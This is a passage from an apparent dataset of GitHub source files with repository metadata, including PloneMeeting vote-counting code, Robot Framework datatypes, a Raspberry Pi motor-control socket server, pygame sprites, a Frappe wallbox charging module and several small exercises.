up or down the workflow?\"\"\"\n res = \"\"\n if not self.hasMeeting() and \\\n not self.query_state() == 'validated' and \\\n not self.isDefinedInTool():\n res = down_or_up_wf(self)\n return res\n\n security.declarePublic('show_votes')\n\n def show_votes(self):\n '''Must I show the \"votes\" tab on this item?'''\n res = False\n if self.hasMeeting() and self.getMeeting().adapted().show_votes():\n # Checks whether votes may occur on this item\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n res = self.getPollType() != 'no_vote' and \\\n self.get_item_voters() and \\\n cfg.isVotable(self)\n return res\n\n security.declarePublic('get_vote_count')\n\n def get_vote_count(self, vote_value, vote_number=0):\n '''Gets the number of votes for p_vote_value.\n A special value 'any_votable' may be passed for p_vote_value,\n in this case every values other than NOT_VOTABLE_LINKED_TO_VALUE are counted.'''\n res = 0\n itemVotes = self.get_item_votes(vote_number)\n item_voter_uids = self.get_item_voters()\n # when initializing, so Meeting.item_votes is empty\n # only return count for NOT_ENCODED_VOTE_VALUE\n if not itemVotes and vote_value == NOT_ENCODED_VOTE_VALUE:\n res = len(item_voter_uids)\n elif not self.get_vote_is_secret(vote_number):\n # public\n for item_voter_uid in item_voter_uids:\n if (item_voter_uid not in itemVotes['voters'] and\n vote_value == NOT_ENCODED_VOTE_VALUE) or \\\n (item_voter_uid in itemVotes['voters'] and\n vote_value == itemVotes['voters'][item_voter_uid]) or \\\n (item_voter_uid in itemVotes['voters'] and\n vote_value == 'any_votable' and\n itemVotes['voters'][item_voter_uid] != NOT_VOTABLE_LINKED_TO_VALUE):\n res += 1\n else:\n # secret\n if vote_value in itemVotes['votes']:\n res = itemVotes['votes'][vote_value] or 0\n elif vote_value == 'any_votable':\n res = len(item_voter_uids)\n elif vote_value == NOT_ENCODED_VOTE_VALUE:\n total = len(item_voter_uids)\n voted = sum([item_vote_count or 0 for item_vote_value, item_vote_count\n in itemVotes['votes'].items()])\n res = total - voted\n elif vote_value == 'any_voted':\n res = sum([item_vote_count or 0 for item_vote_value, item_vote_count\n in itemVotes['votes'].items()])\n return res\n\n security.declarePublic('setFieldFromAjax')\n\n def setFieldFromAjax(self, fieldName, fieldValue):\n '''See doc in utils.py.'''\n # invalidate advices if needed\n if self.willInvalidateAdvices():\n self.update_local_roles(invalidate=True)\n # historize given advices if necessary\n self._historizeAdvicesOnItemEdit()\n return set_field_from_ajax(self, fieldName, fieldValue)\n\n security.declarePublic('getFieldVersion')\n\n def getFieldVersion(self, fieldName, changes=False):\n '''See doc in utils.py.'''\n return getFieldVersion(self, fieldName, changes)\n\n security.declarePublic('getRichTextCSSClass')\n\n def getRichTextCSSClass(self, field_name):\n '''Let's arbitrary add custom CSS class to a RichText widget.'''\n if field_name == 'votesResult':\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n # we return \"modified\" if field contains something\n if tool.isManager(cfg) and self.getRawVotesResult(real=True):\n return \"highlightValue\"\n elif field_name == 'marginalNotes' and self.getRawMarginalNotes():\n return \"highlightValue\"\n return \"\"\n\n security.declarePublic('getRichTextOnSend')\n\n def getRichTextOnSend(self, field_name):\n '''Manage onSend JS parameter of askAjaxChunk for given p_field_name.'''\n if field_name == 'votesResult':\n return 
\"reloadVotesResult\"\n return \"null\"\n\n security.declarePrivate('getAdviceRelatedIndexes')\n\n def getAdviceRelatedIndexes(self):\n '''See doc in interfaces.py.'''\n return ['indexAdvisers']\n\n security.declarePrivate('getReviewStateRelatedIndexes')\n\n def getReviewStateRelatedIndexes(self):\n '''See doc in interfaces.py.'''\n return ['downOrUpWorkflowAgain', 'getTakenOverBy',\n 'reviewProcessInfo', 'previous_review_state']\n\n def getIndexesRelatedTo(self, related_to='annex', check_deferred=True):\n '''See doc in interfaces.py.'''\n tool = api.portal.get_tool('portal_plonemeeting')\n idxs = ['pm_technical_index', 'SearchableText']\n if related_to == 'annex':\n idxs.append('annexes_index')\n elif related_to == 'item_reference':\n pass\n if check_deferred and related_to in tool.getDeferParentReindex():\n # mark item reindex deferred so it can be updated at right moment\n item = self.getSelf()\n setattr(item, REINDEX_NEEDED_MARKER, True)\n idxs.remove('SearchableText')\n return idxs\n\n def _mayChangeAttendees(self):\n \"\"\"Check that user may quickEdit\n item_absents/item_excused/item_non_attendees/votes/...\"\"\"\n return self.hasMeeting() and checkMayQuickEdit(\n self, bypassWritePermissionCheck=True, onlyForManagers=True)\n\n def mayDisplayProposingGroupUsers(self):\n \"\"\" \"\"\"\n res = False\n proposingGroup = self.getProposingGroup()\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n if not proposingGroup or \\\n proposingGroup in tool.get_orgs_for_user() or \\\n tool.isManager(cfg):\n res = True\n return res\n\n security.declarePublic('getLabelItemAssembly')\n\n def getLabelItemAssembly(self):\n '''\n Depending on the fact that we use 'itemAssembly' alone or\n 'assembly, excused, absents', we will translate the 'assembly' label\n a different way.\n '''\n if self.attribute_is_used('assembly_excused') or \\\n self.attribute_is_used('assembly_absents'):\n return _('attendees_for_item')\n else:\n return _('PloneMeeting_label_itemAssembly')\n\n def get_representatives_in_charge(self, check_is_attendee=True):\n '''Return the representative in charge of this item depending on\n selected MeetingItem.groupsInCharge.\n Default use is when item in a meeting so we can check meeting date\n and if representative is attendee for the meeting.'''\n groups_in_charge = self.getGroupsInCharge(theObjects=True)\n meeting = self.getMeeting()\n meeting_date = meeting.date if meeting else None\n attendees = self.get_attendees(the_objects=True)\n res = []\n for gic in groups_in_charge:\n # when p_check_is_attendee=True,\n # only keep held_positions that are also attendees for self\n res += [hp for hp in gic.get_representatives(at_date=meeting_date)\n if (not check_is_attendee or hp in attendees) and\n hp not in res]\n return res\n\n def is_decided(self, cfg, item_state=None, positive_only=False):\n '''Is item considered decided?'''\n item_state = item_state or self.query_state()\n if positive_only:\n return item_state in cfg.getPositiveDecidedStates()\n else:\n return item_state in cfg.getItemDecidedStates()\n\n\nregisterType(MeetingItem, PROJECTNAME)\n","repo_name":"IMIO/Products.PloneMeeting","sub_path":"src/Products/PloneMeeting/MeetingItem.py","file_name":"MeetingItem.py","file_ext":"py","file_size_in_byte":388046,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"42774239155","text":"codigofunciona = False\n\nwhile codigofunciona == False:\n perguntaaluno = input(\"Código está executando? 
\")\n if perguntaaluno == 'n':\n print(\"Corrija o código e tente de novo\")\n elif perguntaaluno == 's':\n perguntadois = input(\"Produz o resultado correto? \")\n if perguntadois == \"n\":\n print(\"Corrija o código e tente de novo e volte para o começo de tudo\")\n elif perguntadois == \"s\":\n print(\"Parabéns!\")\n codigofunciona = True","repo_name":"gabriellaec/desoft-analise-exercicios","sub_path":"backup/user_150/ch138_2020_04_01_19_07_18_250656.py","file_name":"ch138_2020_04_01_19_07_18_250656.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13514998862","text":"from inspect import isclass\nfrom enum import Enum\n\nfrom robot.utils import getdoc, Sortable, typeddict_types, type_name\nfrom robot.running import TypeConverter\n\nfrom .standardtypes import STANDARD_TYPE_DOCS\n\n\nEnumType = type(Enum)\n\n\nclass TypeDoc(Sortable):\n ENUM = 'Enum'\n TYPED_DICT = 'TypedDict'\n CUSTOM = 'Custom'\n STANDARD = 'Standard'\n\n def __init__(self, type, name, doc, accepts=(), usages=None,\n members=None, items=None):\n self.type = type\n self.name = name\n self.doc = doc or '' # doc parsed from XML can be None.\n self.accepts = [type_name(t) if not isinstance(t, str) else t for t in accepts]\n self.usages = usages or []\n # Enum members and TypedDict items are used only with appropriate types.\n self.members = members\n self.items = items\n\n @property\n def _sort_key(self):\n return self.name.lower()\n\n @classmethod\n def for_type(cls, type_info, converters):\n if isinstance(type_info.type, EnumType):\n return cls.for_enum(type_info.type)\n if isinstance(type_info.type, typeddict_types):\n return cls.for_typed_dict(type_info.type)\n converter = TypeConverter.converter_for(type_info, converters)\n if not converter:\n return None\n elif not converter.type:\n return cls(cls.CUSTOM, converter.type_name, converter.doc,\n converter.value_types)\n else:\n # Get `type_name` from class, not from instance, to get the original\n # name with generics like `list[int]` that override it in instance.\n return cls(cls.STANDARD, type(converter).type_name,\n STANDARD_TYPE_DOCS[converter.type], converter.value_types)\n\n @classmethod\n def for_enum(cls, enum):\n accepts = (str, int) if issubclass(enum, int) else (str,)\n return cls(cls.ENUM, enum.__name__, getdoc(enum), accepts,\n members=[EnumMember(name, str(member.value))\n for name, member in enum.__members__.items()])\n\n @classmethod\n def for_typed_dict(cls, typed_dict):\n items = []\n required_keys = list(getattr(typed_dict, '__required_keys__', []))\n optional_keys = list(getattr(typed_dict, '__optional_keys__', []))\n for key, value in typed_dict.__annotations__.items():\n typ = value.__name__ if isclass(value) else str(value)\n required = key in required_keys if required_keys or optional_keys else None\n items.append(TypedDictItem(key, typ, required))\n return cls(cls.TYPED_DICT, typed_dict.__name__, getdoc(typed_dict),\n accepts=(str, 'Mapping'), items=items)\n\n def to_dictionary(self):\n data = {\n 'type': self.type,\n 'name': self.name,\n 'doc': self.doc,\n 'usages': self.usages,\n 'accepts': self.accepts\n }\n if self.members is not None:\n data['members'] = [m.to_dictionary() for m in self.members]\n if self.items is not None:\n data['items'] = [i.to_dictionary() for i in self.items]\n return data\n\n\nclass TypedDictItem:\n\n def __init__(self, key, type, required=None):\n self.key = key\n self.type = type\n self.required = required\n\n 
def to_dictionary(self):\n return {'key': self.key, 'type': self.type, 'required': self.required}\n\n\nclass EnumMember:\n\n def __init__(self, name, value):\n self.name = name\n self.value = value\n\n def to_dictionary(self):\n return {'name': self.name, 'value': self.value}\n","repo_name":"robotframework/robotframework","sub_path":"src/robot/libdocpkg/datatypes.py","file_name":"datatypes.py","file_ext":"py","file_size_in_byte":3647,"program_lang":"python","lang":"en","doc_type":"code","stars":8521,"dataset":"github-code","pt":"21"} +{"seq_id":"22600422672","text":"def zero_matrix(m, n): #m as cols and n as rows\n matrix = []\n for i in range(m):\n rows = []\n for j in range(n):\n rows.append(0)\n matrix.append(rows)\n return matrix\n\nprint(zero_matrix(2, 3))","repo_name":"pujahabibi/codingInterview","sub_path":"Array_Strings/zero_matrix.py","file_name":"zero_matrix.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"44449657321","text":"#recieving information from the users pc\nimport RPi.GPIO as GPIO\nimport socket\nimport time\nimport sys\nfrom _thread import *\n#setting up the networking defenitions\nhost = ''\nport = 5555\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n#setting up the GPIO defenitions\nGPIO.cleanup()\nGPIO.setmode(GPIO.BOARD)\nclockR = 11\ncounterclockR = 15\nPWMR = 13\nclockL = 16\ncounterclockL = 18\nPWML = 12\nGPIO.setup(clockR,GPIO.OUT)\nGPIO.setup(counterclockR,GPIO.OUT)\nGPIO.setup(PWMR,GPIO.OUT)\npwmrV = GPIO.PWM(PWMR,20000)\npwmrV.start(0)\nGPIO.setup(clockL,GPIO.OUT)\nGPIO.setup(counterclockL,GPIO.OUT)\nGPIO.setup(PWML,GPIO.OUT)\npwmlV = GPIO.PWM(PWML,20000)\npwmlV.start(0)\ntry:\n\ts.bind((host,port))\nexcept socket.error as e:\n\tprint(str(e))\n\ns.listen(5)\n\ndef threaded_client(conn):\n\twhile True:\n\t\tdata = conn.recv(256)\n\t\tif len(data)>0:\n\t\t\t#reading the string format\n\t\t\tclean_data = b''\n\t\t\tfor i in range(0,256):\n\t\t\t\tif data[i]==0 and data[i+1]==0:\n\t\t\t\t\tbreak\n\t\t\t\tclean_data += bytes([data[i]])\n\t\t\tdata_string = clean_data.decode('utf-8')\n\t\t\tdata_int = list(map(int,data_string.split(',')))\n\t\t\t#data_int format:\n\t\t\t#data_int[0] - motor1 clockwise direction\n\t\t\t#data_int[1] = motor1 counterclockwise direction\n\t\t\t#data_int[2] = motor1 PWM duty cycle\n\t\t\t#data_int[3] = motor2 clockwise ...\n\t\t\t#data_int[4] = motor2 counterclockwise ...\n\t\t\t#data_int[5] = motor2 PWM\n\t\t\tif data_int[0]==2:\n\t\t\t\tpwmrV.stop()\n\t\t\t\tpwmlV.stop()\n\t\t\t\tGPIO.cleanup()\n\t\t\t\tsys.exit()\n\t\t\tGPIO.output(clockR,data_int[0])\n\t\t\tGPIO.output(counterclockR,data_int[1])\n\t\t\tGPIO.output(clockL,data_int[3])\n\t\t\tGPIO.output(counterclockL,data_int[4])\n\t\t\tpwmrV.ChangeDutyCycle(data_int[2])\n\t\t\tpwmlV.ChangeDutyCycle(data_int[5])\n\t\t\t#print('recieved data:',data_int)\n\nwhile True:\n\tconn,addr = s.accept()\n\tstart_new_thread(threaded_client, (conn,))\n","repo_name":"Fritterino/Trackss-Code","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42154212983","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nFunctional tests for `ugetcli` package - `help` command.\nTests functionality of the cli help command with various options.\n\"\"\"\n\nimport unittest\nfrom 
click.testing import CliRunner\n\nfrom ugetcli import cli\n\n\nclass TestUGetCliHelp(unittest.TestCase):\n \"\"\"Tests for `ugetcli` package - help command.\"\"\"\n\n def test_cli_uget_help(self):\n \"\"\"Test cli: uget help\"\"\"\n runner = CliRunner()\n result = runner.invoke(cli.ugetcli, ['--help'], obj={})\n assert result.exit_code == 0\n assert '--help' in result.output\n assert 'Show this message and exit.' in result.output\n","repo_name":"AgeOfLearning/uget-cli","sub_path":"tests/functional/test_help.py","file_name":"test_help.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"22682677573","text":"import pandas as pd\n# import obspy\nfrom obspy.taup.taup_create import build_taup_model\nmod_text=pd.read_csv('./CDmod',sep=\"\\s+\",header=0,names=['vp','vs','rho','thick','depth','idx'])\niasp_text=pd.read_csv('./iasp91.tvel',sep=\"\\s+\",header=2,names=['depth','vp','vs','rho'])\nfileout=open(\"./CDmod.tvel\",\"w\")\nprint( \"CDmod P Model (%d layers) no \\\"discontinuity\\\" at 120, 760 km\" % (len(mod_text)),file=fileout)\nprint( \"CDmod S Model (%d values to cmb)\" % (len(mod_text)+iasp_text[iasp_text.depth==2939.330].index.tolist()[0]),file=fileout)\nfor ii in range(len(mod_text)):\n print(mod_text.depth[ii],mod_text.vp[ii],mod_text.vs[ii],mod_text.rho[ii],file=fileout)\nidx_0=iasp_text[iasp_text.depth>mod_text.depth[ii]].index.tolist()[0]\nfor jj in range(idx_0,len(iasp_text)):\n print(iasp_text.depth[jj],iasp_text.vp[jj],iasp_text.vs[jj],iasp_text.rho[jj],file=fileout)\nfileout.close()\nbuild_taup_model(\"./CDmod.tvel\")","repo_name":"georom1996/GCSRF_GIG_USTC-Training-Package","sub_path":"Section003/mod/make_tvel.py","file_name":"make_tvel.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"21"} +{"seq_id":"42977194186","text":"# File created by JT Wilcox\r\n\r\nimport pygame as pg\r\nfrom pygame.sprite import Sprite\r\nfrom settings import *\r\nfrom random import randint\r\n\r\n\r\nvec = pg.math.Vector2\r\n\r\n# player class\r\n\r\nclass Player(Sprite):\r\n def __init__(self, game):\r\n Sprite.__init__(self)\r\n # tproperties of the player sprite\r\n self.game = game\r\n self.image = pg.Surface((50,50))\r\n self.image.fill(RED)\r\n self.rect = self.image.get_rect()\r\n self.rect.center = (WIDTH/2, HEIGHT/2)\r\n self.pos = vec(WIDTH/2, HEIGHT/2)\r\n self.vel = vec(0,0)\r\n self.acc = vec(0,0)\r\n self.cofric = 0.1\r\n self.canjump = False\r\n def input(self):\r\n keystate = pg.key.get_pressed()\r\n # if a is pressed sprite will move left\r\n if keystate[pg.K_a]:\r\n self.acc.x = -PLAYER_ACC\r\n # if d is pressed sprite will move right\r\n if keystate[pg.K_d]:\r\n self.acc.x = PLAYER_ACC\r\n # if keystate[pg.K_p]:\r\n # if PAUSED == False:\r\n # PAUSED = True\r\n # print(PAUSED)\r\n # else:\r\n # PAUSED = False\r\n # print(PAUSED)\r\n # defines characteristics of when to jump and how high to jump\r\n def jump(self):\r\n self.rect.x += 1\r\n hits = pg.sprite.spritecollide(self, self.game.platforms, False)\r\n self.rect.x -= 1\r\n # if hits:\r\n self.vel.y = -PLAYER_JUMP\r\n # lets the player know when sprite has left the boundary and where it is\r\n def inbounds(self):\r\n if self.rect.x > WIDTH - 50:\r\n self.pos.x = WIDTH - 25\r\n self.vel.x = 0\r\n print(\"i am off the right side of the screen...\")\r\n if self.rect.x < 0:\r\n self.pos.x = 25\r\n self.vel.x = 0\r\n print(\"i am off the left 
side of the screen...\")\r\n        if self.rect.y > HEIGHT:\r\n            print(\"i am off the bottom of the screen\")\r\n        if self.rect.y < 0:\r\n            print(\"i am off the top of the screen...\")\r\n    # what text will be displayed and how the score will change when there is a collision\r\n    def mob_collide(self):\r\n        hits = pg.sprite.spritecollide(self, self.game.enemies, True)\r\n        if hits:\r\n            print(\"you collided with an enemy...\")\r\n            self.game.score += 1\r\n            print(SCORE)\r\n    # puts gravity into the game so the player is not constantly falling\r\n    def update(self):\r\n        self.acc = vec(0, PLAYER_GRAV)\r\n        self.acc.x = self.vel.x * PLAYER_FRICTION\r\n        self.input()\r\n        self.vel += self.acc\r\n        self.pos += self.vel + 0.5 * self.acc\r\n        self.rect.midbottom = self.pos\r\n# mob class\r\nclass Mob(Sprite):\r\n    # characteristics of the mob\r\n    def __init__(self,width,height, color):\r\n        Sprite.__init__(self)\r\n        self.width = width\r\n        self.height = height\r\n        self.image = pg.Surface((self.width,self.height))\r\n        self.color = color\r\n        self.image.fill(self.color)\r\n        self.rect = self.image.get_rect()\r\n        self.rect.center = (WIDTH/2, HEIGHT/2)\r\n        self.pos = vec(WIDTH/2, HEIGHT/2)\r\n        self.vel = vec(randint(1,5),randint(1,5))\r\n        self.acc = vec(1,1)\r\n        self.cofric = 0.01\r\n\r\n    # ...\r\n    # make it so mobs actually stay within the screen and are always visible\r\n    def inbounds(self):\r\n        if self.rect.x > WIDTH:\r\n            self.vel.x *= -1\r\n        \r\n        if self.rect.x < 0:\r\n            self.vel.x *= -1\r\n        \r\n        if self.rect.y < 0:\r\n            self.vel.y *= -1\r\n        \r\n        if self.rect.y > HEIGHT:\r\n            self.vel.y *= -1\r\n        \r\n    def update(self):\r\n        self.inbounds()\r\n        # self.pos.x += self.vel.x\r\n        # self.pos.y += self.vel.y\r\n        self.pos += self.vel\r\n        self.rect.center = self.pos\r\n\r\n#platform class\r\n\r\nclass Platform(Sprite):\r\n    # characteristics of platforms\r\n    def __init__(self, width, height, x, y, color, variant):\r\n        Sprite.__init__(self)\r\n        self.width = width\r\n        self.height = height\r\n        self.image = pg.Surface((self.width,self.height))\r\n        self.color = color\r\n        self.image.fill(self.color)\r\n        self.rect = self.image.get_rect()\r\n        self.rect.x = x\r\n        self.rect.y = y\r\n        self.variant = variant","repo_name":"jtwilcox1/jwilcox_timeprogress","sub_path":"sprites.py","file_name":"sprites.py","file_ext":"py","file_size_in_byte":4365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37856655446","text":"from typing import Optional\nfrom ..models import LoadCurrenciesResponse\n\n\nasync def load_currencies(self, reload: Optional[bool] = False) -> LoadCurrenciesResponse:\n    \"\"\"\n    Retrieves and caches a list of currencies being traded on the dEX.\n\n    Parameters\n    ----------\n    reload : bool\n        (Optional) Whether to refresh the cache\n\n    Returns\n    -------\n    xrpl_dex_sdk.models.LoadCurrenciesResponse\n        The fetched currencies\n    \"\"\"\n\n    if self.currencies == None or reload == True:\n        currencies = await self.fetch_currencies()\n        self.currencies = currencies\n    return self.currencies\n","repo_name":"AktaryTech/xrpl-dex-sdk-python","sub_path":"xrpl_dex_sdk/methods/load_currencies.py","file_name":"load_currencies.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"34291014719","text":"hexa_table = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'A' , 'B', 'C', 'D', 'E', 'F']\nnum=int(input(\"Enter any Number = \"))\nhexadeci = ''\n\nwhile(num>0):\n    remainder = num%16\n    hexadeci = 
hexa_table[remainder]+ hexadeci\n num = num//16\n \nprint(\"Hexadecimal Number: \",hexadeci)\n\n# ans=[]\n# dic={10:'a',11:'b' ,12:'c' ,13:'d' ,14:'e' ,15:'f'}\n# if(num==0):\n# print(\"0\")\n# if(num<0):\n# num=num+2**32\n# while(num>0):\n# dig=num%16\n# num=num//16\n# if(dig>9 and dig<16):\n# dig=dic[dig]\n# else:\n# dig=dic\n","repo_name":"avneeshk021/Python","sub_path":"hexadecimal.py","file_name":"hexadecimal.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74217625014","text":"# coding: utf-8\nimport click\nimport quandl\nfrom stock import util, models, params\n\n\ndef _multiple_decorator(funcs):\n def wrap(g):\n for f in funcs:\n g = f(g)\n return wrap\n\n\ndef mkdate(ctx, param, datestr):\n return util.str2date(datestr)\n\n\nclass AliasedGroup(click.Group):\n\n def get_command(self, ctx, cmd_name):\n rv = click.Group.get_command(self, ctx, cmd_name)\n if rv is not None:\n return rv\n matches = [x for x in self.list_commands(ctx)\n if x.startswith(cmd_name)]\n if not matches:\n return None\n elif len(matches) == 1:\n return click.Group.get_command(self, ctx, matches[0])\n ctx.fail('Too many matches: %s' % ', '.join(sorted(matches)))\n\n\n@click.group(cls=AliasedGroup, invoke_without_command=True)\n@click.option(\"-k\", \"--key\", envvar='QUANDL_CODE_API_KEY')\ndef cli(key):\n ctx = click.get_current_context()\n if ctx.invoked_subcommand is None:\n click.echo(ctx.get_help(), color=ctx.color)\n if key:\n quandl.ApiConfig.api_key = key\n\n\n@cli.command()\ndef init():\n models.drop_all()\n models.create_all()\n\n\n@cli.command()\ndef config(**kw):\n m = \", \".join(str(s) for (s, _) in params.get_signals().items())\n click.echo(\"SIGNALS: \" + m)\n\n m = \", \".join(str(s) for (s, _) in params.get_lines().items())\n click.echo(\"LINES: \" + m)\n","repo_name":"her0e1c1/pystock","sub_path":"stock/cli/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1388,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"72444805813","text":"import frappe\nfrom frappe.model.document import Document\nfrom datetime import datetime, timedelta\nimport pytz\nimport requests\nfrom requests.auth import HTTPDigestAuth\nfrom requests.auth import HTTPBasicAuth\n\nclass IstChargingFunc(Document):\n\t@frappe.whitelist()\n\tdef get_request(self,url,end):\n\n\t\t#wb_password = self.get_password('password')\n\t\t#self.auth = HTTPBasicAuth(password)\n\t\treg_url = url+end\n\t\tresponse = requests.get(reg_url)\n\t\t# response.raise_for_status()\n\t\t# session = requests.Session()\n\t\t# session.auth = HTTPDigestAuth(password)\n\t\t#print(response.text)\n\t\treturn response.json()\n\t\n\t@frappe.whitelist()\n\tdef get_data(self):\n\t\twallbox_list = frappe.get_all(\"Wallbox\")\n\t\tfor el in wallbox_list:\n\t\t\twallbox_doc = frappe.get_doc(\"Wallbox\",el[\"name\"])\n\t\t\turl = wallbox_doc.endpoint_url\n\t\t\tend = \"getLog\"\n\t\t\twallbox_name = wallbox_doc.name\n\t\t\tdata = self.get_request(url,end)\n\t\t\tfor el in data[\"list\"]:\n\n\t\t\t\tdate = datetime.fromtimestamp(el[\"timestamp\"])-timedelta(hours=1)\n\t\t\t\tprint(date)\n\n\t\t\t\tduration = timedelta(milliseconds =el[\"duration\"])\n\t\t\t\tenergy = el[\"energy\"]\n\t\t\t\tcosts = round(el[\"price\"]*el[\"energy\"]/100,2)\n\t\t\t\tprint(date,duration,costs)\n\t\t\t\tlogfile_list = frappe.get_all(\"Charging process\", filters={\"date\": date})\n\t\t\t\tif not 
logfile_list:\n\n\t\t\t\t\tlogfile_doc = frappe.get_doc({\n\t\t\t\t\t\t\t\"doctype\": \"Charging process\",\n\t\t\t\t\t\t\t\"user\": el[\"username\"],\n\t\t\t\t\t\t\t\"user_id\" : el[\"uid\"],\n\t\t\t\t\t\t\t\"date\": date,\n\t\t\t\t\t\t\t\"duration\": duration,\n\t\t\t\t\t\t\t\"energy\" : energy,\n\t\t\t\t\t\t\t\"costs\" : costs,\n\t\t\t\t\t\t\t\"wallbox_name\": wallbox_name\n\t\t\t\t\t\t\t})\n\t\t\t\t\tlogfile_doc.save()\n\t\t\n\t@frappe.whitelist()\n\tdef get_wallbox(self):\n\t\t\n\t\twallbox_list = frappe.get_all(\"Wallbox\")\n\t\tprint(wallbox_list)\n\t\tfor el in wallbox_list:\n\t\t\twallbox_doc = frappe.get_doc(\"Wallbox\",el[\"name\"])\n\t\t\turl = wallbox_doc.endpoint_url\n\t\t\tend = \"getParameters\"\n\t\t\tparameters = self.get_request(url,end)\n\t\t\tprint(parameters[\"list\"])\n\t\t\tif parameters[\"list\"][0][\"vehicleState\"] == 1:\n\t\t\t\tveh_st = \"ready\"\n\t\t\telif parameters[\"list\"][0][\"vehicleState\"] == 2:\n\t\t\t\tveh_st = \"Vehicle detected\"\n\t\t\telif parameters[\"list\"][0][\"vehicleState\"] == 3:\n\t\t\t\tveh_st = \"Vehicle charging\"\n\t\t\telif parameters[\"list\"][0][\"vehicleState\"] == 5:\n\t\t\t\tveh_st = \"Error\"\n\t\t\tif parameters[\"list\"][0][\"evseState\"] == True:\n\t\t\t\tevse_st = \"Charging station unlocked\"\n\t\t\telif parameters[\"list\"][0][\"evseState\"] == False:\n\t\t\t\tevse_st = \"Charging station locked\"\n\t\t\t\n\t\t\twallbox_doc.vehicle_state = veh_st\n\t\t\twallbox_doc.evse_state = evse_st\n\t\t\twallbox_doc.duration = timedelta(milliseconds =parameters[\"list\"][0][\"duration\"])\n\t\t\twallbox_doc.max_current = parameters[\"list\"][0][\"maxCurrent\"]\n\t\t\twallbox_doc.actual_current_in_a = parameters[\"list\"][0][\"actualCurrent\"]\n\t\t\twallbox_doc.actual_power = parameters[\"list\"][0][\"actualPower\"]\n\t\t\twallbox_doc.always_active = parameters[\"list\"][0][\"alwaysActive\"]\n\t\t\twallbox_doc.last_action_user = parameters[\"list\"][0][\"lastActionUser\"]\n\t\t\twallbox_doc.last_action_uid = parameters[\"list\"][0][\"lastActionUID\"]\n\t\t\twallbox_doc.energy = parameters[\"list\"][0][\"energy\"]\n\t\t\twallbox_doc.mileage = parameters[\"list\"][0][\"mileage\"]\n\t\t\twallbox_doc.meter_reading = parameters[\"list\"][0][\"meterReading\"]\n\t\t\twallbox_doc.save()\n\t\t\n\t\t\n\t\t \t\t\t\t\n\t\t\n\t\t\n\n\t \t\n\n\n\t\t\n\n\t\n\n\n","repo_name":"itsdaveit/its_charging","sub_path":"its_charging/its_charging/doctype/ist_charging_func/ist_charging_func.py","file_name":"ist_charging_func.py","file_ext":"py","file_size_in_byte":3220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38493674437","text":"from collections import Counter\nimport common.input_data as input_data\nSums = dict[int, Counter[int]]\ndef find_first_wrong_number(numbers: list[int]) -> int:\n sums = make_sums(numbers[:25])\n numbers_to_check = list(numbers)\n while numbers_to_check:\n new_number = numbers_to_check[25]\n if not is_valid_number(new_number, sums):\n return new_number\n number = numbers_to_check.pop(0)\n remove_from_sums(number, sums)\n add_to_sums(new_number, sums)\n\n raise RuntimeError(\"Should not reach here, no number was detected as valid\")\n\ndef is_valid_number(number: int, sums: Sums) -> bool:\n return any(sum_counter[number] != 0 for sum_counter in sums.values())\n\ndef remove_from_sums(number: int, sums: Sums):\n del sums[number]\n for number2, sum_counter in sums.items():\n sum_counter[number + number2] -= 1\n\ndef add_to_sums(number: int, sums: Sums):\n new_sums = 
Counter(number + number2 for number2 in sums)\n for number2, sum_counter in sums.items():\n sum_counter[number + number2] += 1\n sums[number] = new_sums\n\ndef make_sums(numbers: list[int]) -> Sums:\n sums: Sums = {}\n for index1, number in enumerate(numbers):\n sums[number] = Counter(number + num2\n for index2, num2 in enumerate(numbers)\n if index1 != index2)\n return sums\n\ndef find_encryption_weakness(numbers: list[int]) -> int:\n invalid_number = find_first_wrong_number(numbers)\n candidate_range: list[int] = []\n numbers_to_check = list(numbers)\n while numbers_to_check:\n sum_value = sum(candidate_range)\n if sum_value == invalid_number and len(candidate_range) > 1:\n return min(candidate_range) + max(candidate_range)\n if sum_value < invalid_number:\n candidate_range.append(numbers_to_check.pop(0))\n if sum_value > invalid_number:\n candidate_range.pop(0)\n\n raise RuntimeError(\"Cannot find an encryption weakness\")\n\n\nNUMBERS = input_data.read(\"input/input9.txt\", int)\n\nif __name__ == \"__main__\":\n print(f\"First number that's wrong: {find_first_wrong_number(NUMBERS)}\")\n\n print(f\"Encryption Weakness: {find_encryption_weakness(NUMBERS)}\")\n","repo_name":"pviafore/AdventOfCode2020","sub_path":"challenge9.py","file_name":"challenge9.py","file_ext":"py","file_size_in_byte":2231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"69984091254","text":"import matplotlib.pyplot as plt\nimport pandas as 